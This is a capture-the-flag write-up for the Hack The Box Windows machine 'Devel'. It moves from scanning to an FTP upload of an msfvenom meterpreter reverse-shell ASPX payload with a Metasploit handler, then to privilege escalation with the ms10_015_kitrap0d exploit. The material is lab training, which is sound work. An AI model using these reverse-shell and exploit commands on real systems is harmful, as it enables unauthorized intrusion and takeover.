# HTB | Devel

This is a Windows box. You can find it [here](https://app.hackthebox.com/machines/Devel).

#### Skill Learned

* kitrap0d (ms10-015)

## NMAP

IP: 10.10.10.5

```
nmap -sC -sV 10.10.10.5 -Pn -T5
```

<figure><img src="https://2050535832-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FC1JOqzbmZkOvdQTzItEo%2Fuploads%2Fb382VnsuTjQkgXKmWu1f%2Fimage.png?alt=media&#x26;token=301c5f99-09c2-4175-8b00-6a60040846f3" alt=""><figcaption><p>nmap</p></figcaption></figure>

### Port 21

anonymous login is allowed

<figure><img src="https://2050535832-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FC1JOqzbmZkOvdQTzItEo%2Fuploads%2FAWxVhKyaf6ZTZjqOvt51%2Fimage.png?alt=media&#x26;token=5d4075d4-6dc8-4678-b941-e5b8bee04b79" alt=""><figcaption><p>ftp 10.10.10.5</p></figcaption></figure>

Found files

<figure><img src="https://2050535832-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FC1JOqzbmZkOvdQTzItEo%2Fuploads%2FXSBBA7QJmyrNIQbzdNTT%2Fimage.png?alt=media&#x26;token=6b23016e-332e-4081-b0c2-c93747d341e6" alt=""><figcaption><p>ftp files</p></figcaption></figure>

<figure><img src="https://2050535832-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FC1JOqzbmZkOvdQTzItEo%2Fuploads%2FpMwUgxSxFgibWVrAgbt8%2Fimage.png?alt=media&#x26;token=08572e1b-c154-4108-b48d-46739c44f4fd" alt=""><figcaption></figcaption></figure>

Nothing interesting was found here

### Port 80

<figure><img src="https://2050535832-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FC1JOqzbmZkOvdQTzItEo%2Fuploads%2FpJXpmyvSasvIWxy2RM44%2Fimage.png?alt=media&#x26;token=22076e82-86a2-4fe6-81a8-725ba9f6cf36" alt=""><figcaption><p>port 80</p></figcaption></figure>

Let's do gobuster

we found `http://10.10.10.5/aspnet_client/system_web/`

<figure><img src="https://2050535832-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FC1JOqzbmZkOvdQTzItEo%2Fuploads%2Fd660gmNv2sjXdBr5mbyy%2Fimage.png?alt=media&#x26;token=55d30bad-688e-48f2-b3e5-c603571c8e0e" alt=""><figcaption><p>gobuster</p></figcaption></figure>

## Foothold & Priv Esc

#### FTP

try putting test.txt

<figure><img src="https://2050535832-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FC1JOqzbmZkOvdQTzItEo%2Fuploads%2Fag1U9xIVoTtQdwduf3fo%2Fimage.png?alt=media&#x26;token=a33ca6e8-53c0-4682-b84b-6793837652ec" alt=""><figcaption><p>ftp</p></figcaption></figure>

<figure><img src="https://2050535832-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FC1JOqzbmZkOvdQTzItEo%2Fuploads%2FxhwZw4ThN9FJhri20WgC%2Fimage.png?alt=media&#x26;token=61238985-b5b3-40c5-9a3d-7b33f573a659" alt=""><figcaption><p>/test.txt</p></figcaption></figure>

Since there is asp, we make a payload for reverse shell

```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.36 LPORT=1234 -f aspx > devel.aspx
```

<figure><img src="https://2050535832-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FC1JOqzbmZkOvdQTzItEo%2Fuploads%2FKQlqCratP5iv74cWk0Oc%2Fimage.png?alt=media&#x26;token=e8a8cec9-d76e-4eb1-89e0-bdef376d1050" alt=""><figcaption><p>msfvenom</p></figcaption></figure>

and put in the server via FTP

<figure><img src="https://2050535832-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FC1JOqzbmZkOvdQTzItEo%2Fuploads%2FiYTkGOp14nfpiabRxfkG%2Fimage.png?alt=media&#x26;token=79f63463-b189-4a51-a918-f9b5ec82c896" alt=""><figcaption><p>put devel.aspx</p></figcaption></figure>

```
open msfconsole 
use multi/handler 
set payload windows/meterpreter/reverse_tcp 
set lhost tun0 
set lport 1234 
set ExitOnSession false 
exploit -j
```

load the page `http://10.10.10.5/devel.aspx` and boom you have a session on our nc

<figure><img src="https://2050535832-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FC1JOqzbmZkOvdQTzItEo%2Fuploads%2FfCyH8PFmKxeUksNTJKyd%2Fimage.png?alt=media&#x26;token=b4424fe1-2113-434e-a567-83a6dc639c10" alt=""><figcaption><p>running payload</p></figcaption></figure>

and run `use post/multi/recon/local_exploit_suggester`

<figure><img src="https://2050535832-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FC1JOqzbmZkOvdQTzItEo%2Fuploads%2FGLXqwBsWeBu0iN3WEy7s%2Fimage.png?alt=media&#x26;token=dc74e7a3-4cbf-4d78-8326-7acc5f2b8e13" alt=""><figcaption><p>exploit suggester</p></figcaption></figure>

on trying `exploit/windows/local/ms10_015_kitrap0d` I got the shell

<figure><img src="https://2050535832-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FC1JOqzbmZkOvdQTzItEo%2Fuploads%2FE5FUhGin4L4Ok7AgE1Cu%2Fimage.png?alt=media&#x26;token=60547667-5e98-43cf-baef-bf390194959a" alt=""><figcaption><p>shell</p></figcaption></figure>

Fund user.txt

<figure><img src="https://2050535832-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FC1JOqzbmZkOvdQTzItEo%2Fuploads%2FJF8CSf2FUMp47AjksJDt%2Fimage.png?alt=media&#x26;token=d31492c5-c93f-4f24-97c3-906d55ec8a24" alt=""><figcaption><p>user.txt</p></figcaption></figure>

Found root.txt

<figure><img src="https://2050535832-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FC1JOqzbmZkOvdQTzItEo%2Fuploads%2FROsLr2alacHICd1O1blR%2Fimage.png?alt=media&#x26;token=12619f3d-1710-4383-924b-2a9abb6dc197" alt=""><figcaption><p>root.txt</p></figcaption></figure>
